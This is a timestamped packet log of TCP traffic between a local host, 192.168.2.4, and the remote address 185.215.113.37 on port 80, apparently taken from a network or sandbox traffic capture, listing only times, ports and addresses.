Oct 3, 2024 18:38:21.212982893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213004112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213016987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213031054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213067055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213489056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213538885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213571072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213582039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213606119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213607073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213627100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213641882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213669062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213675976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213694096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213710070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213725090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213742971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213757992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213777065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213792086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213809967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213831902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213843107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213856936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.213881969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.213936090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214282036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214334011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214407921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214442015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214473963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214498997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214505911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214536905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214540005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214571953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214575052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214591980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214607954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214622974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214642048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214659929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214674950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214706898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214710951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214740038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.214745998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.214778900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215091944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215342045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215410948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215415955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215449095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215480089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215483904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215502977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215517044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215550900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215550900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215570927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215585947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215603113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215631962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215652943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215683937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215764046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215796947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215827942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215847015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215862989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215897083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.215987921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.215987921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216392040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216444016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216456890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216479063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216496944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216512918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216532946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216546059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216567993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216579914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216595888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216614008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216626883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216649055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216670990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216680050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216711998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216712952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216732979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216747046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216778040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216779947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.216799021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.216864109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.217767954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.217801094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.217830896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.217834949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.217850924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.217869043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.217886925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.217904091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.217919111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.217937946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.217955112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.217972040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.217988968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218005896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218028069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218038082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218069077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218070984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218105078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218107939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218137980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218139887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218162060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218172073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218202114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218204975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218224049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218357086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218581915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218616009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218640089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218647957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218664885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218682051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218698978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218715906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218739033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218847036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.218878984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.218920946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.301923037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.301975965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302011013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302011967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302038908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302046061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302062035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302083015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302126884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302141905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302181959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302223921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302278042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302284002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302311897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302340984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302372932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302546024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302580118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302649021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302671909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302705050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302725077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302736044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.302759886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.302783966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.303201914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.303235054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.303270102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.303278923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.303302050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.303316116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.303406000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.303447962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.303468943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.303483963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.303497076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.303518057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.303528070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.303554058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.303575039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.303585052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.303623915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.303643942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.336379051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.336438894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.336455107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.336468935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.336498976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.336523056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.336560011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.336592913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.336611032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.336627007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.336643934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.336663008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.336678028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.336709976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.336922884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.336982965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337146044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337205887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337300062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337335110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337354898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337385893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337474108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337507963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337541103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337554932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337591887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337610006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337625980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337645054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337660074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337708950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337709904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337747097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337763071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337779999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337798119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337814093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337832928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337852955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337867975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337889910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337902069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337924004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337937117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337959051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.337970972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.337991953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338006973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338027000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338041067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338063955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338073015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338112116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338296890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338521957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338555098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338567019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338589907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338588953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338608027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338634968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338670015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338704109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338722944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338737011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.338754892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.338784933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339209080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339242935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339274883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339276075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339298964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339369059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339396954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339418888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339420080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339452982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339472055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339485884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339509010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339519024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339567900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339571953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339620113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339623928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339658022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.339673042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339729071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.339936018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340015888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340148926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340183020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340203047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340217113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340234995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340250015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340266943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340282917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340303898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340338945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340338945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340372086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340389967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340405941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340423107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340439081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340456963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340472937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340506077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340522051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340562105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340842962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340876102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340910912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340928078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340945959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340964079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.340977907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.340998888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341011047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341025114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341044903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341063976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341079950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341113091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341135979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341145039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341176033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341178894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341206074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341212988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341228962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341312885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341622114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341656923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341675997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341691017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341711044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341738939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341758013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341789961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341794014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341842890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341876984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341896057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341911077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341928959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.341943979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.341965914 CEST	49730	80	192.168.2.4	185.215.113.37
